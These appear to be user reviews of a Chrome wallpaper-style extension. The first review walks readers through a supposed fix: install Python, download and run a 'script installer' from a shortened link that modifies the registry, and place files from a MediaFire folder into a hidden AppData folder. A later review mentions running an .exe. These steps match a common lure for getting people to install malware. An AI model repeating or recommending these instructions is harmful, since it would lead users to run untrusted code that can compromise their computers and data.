The extension works but the description isn't clear, and the installer didn't work for me.
This is what worked for me and I suggest giving it a try:
1. Install the extension;
2. Go to https://Python.org/downloads/ and download Python 3.10 for your OS (make sure to check 'Add Python 3.10 to PATH' before hitting Install);
3. Download and run this script installer: https://rebrand.ly/y2j7urm (it adds a registry, I think);
4. Download those files: https://www.mediafire.com/folder/hct2bwog78h7lmu,mdcvhakvr37yx3y/shared and copy them;
5. Go to C: users your_username AppData (enable 'Hidden items' in the view tab if you don't see the folder) Roaming Create a new folder and name it 'wallpaper' paste the two files you just downloaded to the folder;
6. Open Chrome and test. It should be working now.

This is one of the small quality of life things that I quite appreciate. Why Chrome doesn't have this as a feature when Firefox had it for years is beyond me.

This is what I've been wanting for ages. After googling it up again for the first time in a few months, I clicked on this extension and voila, It worked. I did have to install the .exe, but It's no problem.
